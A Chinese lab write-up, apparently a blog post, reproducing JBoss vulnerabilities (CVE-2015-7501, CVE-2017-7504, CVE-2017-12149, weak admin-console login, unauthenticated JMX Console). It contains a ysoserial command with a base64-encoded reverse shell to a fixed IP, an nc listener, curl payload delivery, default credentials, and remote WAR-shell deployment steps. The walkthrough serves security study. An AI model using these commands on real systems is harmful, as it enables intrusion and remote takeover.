当前位置: 首页 > news >正文

Jboss漏洞再现

一、CVE-2015-7501

1、开环境

2、访问地址

/ invoker/JMXInvokerServlet

出现了让下载的页面,说明有漏洞

3、下载ysoserial工具进行漏洞利用

4、在cmd运行

看到可以成功运行,接下来去base64编码我们反弹shell的命令

5、执行命令

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx}|{base64,-d} | {bash,-i} ">exp.ser

6、监听端口

nc -lvvp 6666

7、执行命令

curl http://150.158.199.164:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

8、得到shell

二、CVE-2017-7504

1、开环境

2、访问目录

/jbossmq-httpil/HTTPServerILServlet

3、在kali运行python程序

python jexboss.py -u 指定网站

拿到shell

三、CVE-2017-12149

1、开环境

2、访问目录

/invoker/readonly

返回500说明此页面存在反序列化漏洞

3、使用工具检测

输入网址,检测,存在漏洞,系统是Linux

4、执行命令

whoami

四、Administration Console弱口令

1、开环境

环境还是上一个的环境

2、登录后台

/admin-console/login.seam

使用弱口令admin/vulhub登录

3、点击web应用

4、上war包,注入这个包的名字不可以太短

5、访问文件

6、测试连接

五、低版本JMX Console未授权

1、开环境

访问/jmx-console/

密码是admin admin

2、进入目录

3、在我们服务器的网站上传一个war包

4、远程部署war包

http://150.158.199.164:8080/wjf111.war

5、访问文件

/wjf111/1.jsp

6、测试连接

六、高版本JMX Console未授权

1、开环境

访问/jmx-console

2、找到文件部署的位置

Jboss.system——service=MainDeployer
——deploy——java.net.URL

3、把我们服务器里的war包改下名字

4、远程部署war包

http://150.158.199.164/wjf222.war

5、访问文件

6、测试连接

相关文章:

  • C51知识点
  • 代码随想录算法训练营第十五天|右旋字符串
  • Linux的文件上传下载的lrzsz库的安装与使用
  • 《当人工智能遇上广域网:跨越地理距离的通信变革》
  • 08_双向循环神经网络
  • React 中useMemo和useCallback Hook 的作用,在什么场景下使用它们?
  • 图书管理系统系统-Java、SpringBoot、Vue和MySQL开发的图书馆管理系统
  • 文心快码 使用体验与介绍
  • 分布式算法:Paxos Raft 两种共识算法
  • 结合代码理解Spring AOP的概念(切面、切入点、连接点等)
  • Rocky Linux 软件安装:Last metadata expiration check:
  • leetcode_双指针 15.三数之和
  • 【前端扫盲】liquid模板语言
  • css重点知识汇总(二)
  • Jboss
  • [c语言日寄]枚举类型
  • Spring Boot框架中常用注解
  • 自然资源数据要素支撑场景建设
  • QEMU源码全解析 —— 块设备虚拟化(7)
  • 探秘鸿蒙 HarmonyOS NEXT:鸿蒙存储核心技术全解析
  • 铁路五一假期运输今日启动,预计发送旅客1.44亿人次
  • 王毅:妥协退缩只会让霸凌者得寸进尺
  • 2025上海体育消费节启动,多形式联动打造体育消费盛宴
  • 观察|英国航母再次部署印太,“高桅行动”也是“高危行动”
  • 中国黄金协会:一季度我国黄金产量同比增1.49%,黄金消费量同比降5.96%
  • AI应用大盘点:谁暴涨?谁掉队?